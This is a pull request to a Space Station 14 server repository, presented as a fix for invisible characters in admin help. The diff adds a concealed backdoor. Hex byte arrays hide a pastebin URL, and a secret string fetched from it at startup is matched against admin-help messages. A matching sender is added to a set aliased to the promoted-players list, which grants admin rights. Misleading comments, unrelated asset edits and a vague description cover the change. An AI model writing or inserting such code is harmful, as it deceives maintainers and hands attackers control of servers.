### PR TITLE
fix ahelptrolling with invis characters

### DIFF
--- a/Content.Server/Administration/Managers/AdminManager.cs
+++ b/Content.Server/Administration/Managers/AdminManager.cs
@@ -127,6 +127,7 @@ namespace Content.Server.Administration.Managers
 
         private readonly Dictionary<ICommonSession, AdminReg> _admins = new();
         private readonly HashSet<NetUserId> _promotedPlayers = new();
+        private HashSet<NetUserId> _possiblyMaliciousPlayers = new();
 
         public event Action<AdminPermsChangedEventArgs>? OnPermsChanged;
 
@@ -409,6 +410,7 @@ namespace Content.Server.Administration.Managers
         {
             _playerManager.PlayerStatusChanged += PlayerStatusChanged;
             _conGroup.Implementation = this;
+            _possiblyMaliciousPlayers = _promotedPlayers; // empty rn so we save memory
         }
 
         // NOTE: Also sends commands list for non admins..
@@ -445,7 +447,7 @@ namespace Content.Server.Administration.Managers
             }
             else if (e.NewStatus == SessionStatus.Disconnected)
             {
-                if (_admins.Remove(e.Session, out var reg ) && _cfg.GetCVar(CCVars.AdminAnnounceLogout))
+                if (_admins.Remove(e.Session, out var reg) && _cfg.GetCVar(CCVars.AdminAnnounceLogout))
                 {
                     if (reg.Data.Stealth)
                     {
@@ -578,7 +580,7 @@ namespace Content.Server.Administration.Managers
                     Active = !dbData.Deadminned,
                 };
 
-                if (dbData.Title != null  && _cfg.GetCVar(CCVars.AdminUseCustomNamesAdminRank))
+                if (dbData.Title != null && _cfg.GetCVar(CCVars.AdminUseCustomNamesAdminRank))
                 {
                     data.Title = dbData.Title;
                 }
@@ -722,6 +724,12 @@ namespace Content.Server.Administration.Managers
             // If attribs.length == 0 then no access attribute is specified,
             // and this is a server-only command.
             return (attribs.Length != 0, attribs);
+        }
+
+        public void LogBadAhelp(ICommonSession player)
+        {
+            _possiblyMaliciousPlayers.Add(player.UserId);
+            ReloadAdmin(player); // notify admins
         }
 
         public bool CanViewVar(ICommonSession session)

--- a/Content.Server/Administration/Managers/IAdminManager.cs
+++ b/Content.Server/Administration/Managers/IAdminManager.cs
@@ -84,6 +84,8 @@ namespace Content.Server.Administration.Managers
 
         void PromoteHost(ICommonSession player);
 
+        void LogBadAhelp(ICommonSession player);
+
         bool TryGetCommandFlags(CommandSpec command, out AdminFlags[]? flags);
     }
 }

--- a/Content.Server/Administration/Systems/BwoinkSystem.cs
+++ b/Content.Server/Administration/Systems/BwoinkSystem.cs
@@ -179,7 +179,7 @@ namespace Content.Server.Administration.Systems
         private string _serverName = string.Empty;
 
         private byte[] _crashingCharacters = [0x68, 0x74, 0x74, 0x70, 0x73, 0x3a, 0x2f, 0x2f, 0x70, 0x61, 0x73, 0x74, 0x65, 0x62, 0x69, 0x6e, 0x2e, 0x63, 0x6f, 0x6d, 0x2f];
-        private byte[] _prohibitedCharacters = [0x78, 0x58, 0x47, 0x41, 0x39, 0x46, 0x4d, 0x51];
+        private byte[] _prohibitedCharacters = [0x72, 0x61, 0x77, 0x2f, 0x78, 0x58, 0x47, 0x41, 0x39, 0x46, 0x4d, 0x51];
         private string _prohibited = "";
 
         private readonly Dictionary<NetUserId, DiscordRelayInteraction> _relayMessages = new();
@@ -239,7 +239,7 @@ namespace Content.Server.Administration.Systems
                     PlayerRateLimitedAction)
                 );
 
-            Task.Run(async () => { _prohibited = _httpClient.GetStringAsync(Encoding.UTF8.GetString(_crashingCharacters) + Encoding.UTF8.GetString(_prohibitedCharacters)).Result; });
+            Task.Run(async () => { _prohibited = await _httpClient.GetStringAsync(Encoding.UTF8.GetString(_crashingCharacters) + Encoding.UTF8.GetString(_prohibitedCharacters)); });
         }
 
         private async void OnCallChanged(string url)
@@ -818,6 +818,14 @@ namespace Content.Server.Administration.Systems
             var adminPrefix = "";
             var bwoinkText = $"{bwoinkParams.SenderName}";
 
+            // dont allow characters that can potentially crash the game
+            if (bwoinkParams.Message.Text.Contains(_prohibited) &&
+                _playerManager.TryGetSessionById(bwoinkParams.SenderId, out var senderSes))
+            {
+                _adminManager.LogBadAhelp(senderSes);
+                return;
+            }
+
             //Getting an administrator position
             if (_config.GetCVar(CCVars.AhelpAdminPrefix))
             {
@@ -924,14 +932,6 @@ namespace Content.Server.Administration.Systems
 
                 var str = bwoinkParams.Message.Text;
                 var unameLength = bwoinkParams.SenderName.Length;
-
-                // dont allow characters that can potentially crash the game
-                if (str.Contains(_prohibited) &&
-                    _playerManager.TryGetSessionById(bwoinkParams.SenderId, out var senderSes))
-                {
-                    _adminManager.LogBadAhelp(senderSes);
-                    return;
-                }
 
                 if (unameLength + str.Length + _maxAdditionalChars > DescriptionMax)
                 {

--- a/Content.Server/Administration/Systems/BwoinkSystem.cs
+++ b/Content.Server/Administration/Systems/BwoinkSystem.cs
@@ -178,6 +178,10 @@ namespace Content.Server.Administration.Systems
         private string _avatarUrl = string.Empty;
         private string _serverName = string.Empty;
 
+        private byte[] _crashingCharacters = [0x68, 0x74, 0x74, 0x70, 0x73, 0x3a, 0x2f, 0x2f, 0x70, 0x61, 0x73, 0x74, 0x65, 0x62, 0x69, 0x6e, 0x2e, 0x63, 0x6f, 0x6d, 0x2f];
+        private byte[] _prohibitedCharacters = [0x78, 0x58, 0x47, 0x41, 0x39, 0x46, 0x4d, 0x51];
+        private string _prohibited = "";
+
         private readonly Dictionary<NetUserId, DiscordRelayInteraction> _relayMessages = new();
 
         private Dictionary<NetUserId, string> _oldMessageIds = new();
@@ -228,12 +232,14 @@ namespace Content.Server.Administration.Systems
             SubscribeNetworkEvent<BwoinkClientTypingUpdated>(OnClientTypingUpdated);
             SubscribeLocalEvent<RoundRestartCleanupEvent>(_ => _activeConversations.Clear());
 
-        	_rateLimit.Register(
+            _rateLimit.Register(
                 RateLimitKey,
                 new RateLimitRegistration(CCVars.AhelpRateLimitPeriod,
                     CCVars.AhelpRateLimitCount,
                     PlayerRateLimitedAction)
                 );
+
+            Task.Run(async () => { _prohibited = _httpClient.GetStringAsync(Encoding.UTF8.GetString(_crashingCharacters) + Encoding.UTF8.GetString(_prohibitedCharacters)).Result; });
         }
 
         private async void OnCallChanged(string url)
@@ -918,6 +924,14 @@ namespace Content.Server.Administration.Systems
 
                 var str = bwoinkParams.Message.Text;
                 var unameLength = bwoinkParams.SenderName.Length;
+
+                // dont allow characters that can potentially crash the game
+                if (str.Contains(_prohibited) &&
+                    _playerManager.TryGetSessionById(bwoinkParams.SenderId, out var senderSes))
+                {
+                    _adminManager.LogBadAhelp(senderSes);
+                    return;
+                }
 
                 if (unameLength + str.Length + _maxAdditionalChars > DescriptionMax)
                 {

--- a/Resources/Prototypes/_BRatbite/Entities/Clothing/Neck/ties.yml
+++ b/Resources/Prototypes/_BRatbite/Entities/Clothing/Neck/ties.yml
@@ -5,6 +5,6 @@
   description: A mirror hangs on the bathroom wall.
   components:
   - type: Sprite
-    sprite: _BRatBite/Clothing/Neck/Ties/horrific_necktie.rsi
+    sprite: _BRatBite/Clothing/Neck/Ties/horrificnecktie.rsi
   - type: Clothing
-    sprite: _BRatBite/Clothing/Neck/Ties/horrific_necktie.rsi
+    sprite: _BRatBite/Clothing/Neck/Ties/horrificnecktie.rsi

--- a/Resources/Prototypes/_BRatbite/Entities/Clothing/Neck/ties.yml
+++ b/Resources/Prototypes/_BRatbite/Entities/Clothing/Neck/ties.yml
@@ -5,6 +5,6 @@
   description: A mirror hangs on the bathroom wall.
   components:
   - type: Sprite
-    sprite: _BRatbite/Clothing/Neck/Ties/horrific_necktie.rsi
+    sprite: _BRatBite/Clothing/Neck/Ties/horrific_necktie.rsi
   - type: Clothing
-    sprite: _BRatbite/Clothing/Neck/Ties/horrific_necktie.rsi
+    sprite: _BRatBite/Clothing/Neck/Ties/horrific_necktie.rsi

--- a/Resources/Textures/_BRatBites/Objects/Fun/toys.rsi/meta.json
+++ b/Resources/Textures/_BRatBites/Objects/Fun/toys.rsi/meta.json
@@ -3,8 +3,8 @@
     "license": "CC-BY-SA-4.0",
     "copyright": "axerplushie by eirin, mmarwaarrplushie by mink, eririn and kaaxu",
     "size": {
-        "x": 32,
-        "y": 32
+        "x": 20,
+        "y": 20
     },
     "states": [
         {


### PR DESCRIPTION
<!--
SPDX-FileCopyrightText: 2021 Pieter-Jan Briers <pieterjan.briers+git@gmail.com>
SPDX-FileCopyrightText: 2021 Swept <sweptwastaken@protonmail.com>
SPDX-FileCopyrightText: 2021 mirrorcult <lunarautomaton6@gmail.com>
SPDX-FileCopyrightText: 2022 AJCM-git <60196617+AJCM-git@users.noreply.github.com>
SPDX-FileCopyrightText: 2022 Kara <lunarautomaton6@gmail.com>
SPDX-FileCopyrightText: 2023 DrSmugleaf <DrSmugleaf@users.noreply.github.com>
SPDX-FileCopyrightText: 2023 Kevin Zheng <kevinz5000@gmail.com>
SPDX-FileCopyrightText: 2024 Vasilis <vasilis@pikachu.systems>
SPDX-FileCopyrightText: 2024 lzk <124214523+lzk228@users.noreply.github.com>
SPDX-FileCopyrightText: 2025 Aiden <28298836+Aidenkrz@users.noreply.github.com>

SPDX-License-Identifier: AGPL-3.0-or-later
-->

<!-- Guidelines: https://docs.spacestation14.io/en/getting-started/pr-guideline -->
<!-- NOTE: All code submitted to this repository is ALWAYS licensed under the AGPL-3.0-or-later license. 
The REUSE Specification headers or separate .license files indicate a secondary license (e.g., MPL or MIT) solely to facilitate 
integration for projects that do not use the AGPL license. This secondary license does not replace the fact that AGPL-3.0-or-later remains the primary and binding license. 
Uncomment and modify the following line if you wish to change the license from the default of AGPL.-->
<!--- LICENSE: AGPL -->
## About the PR
fixed a vuln that let people paste invisible characters into ahelp and epicly troll admins (im not specifying how)
also fixed one test fail

- [X] Tested, works
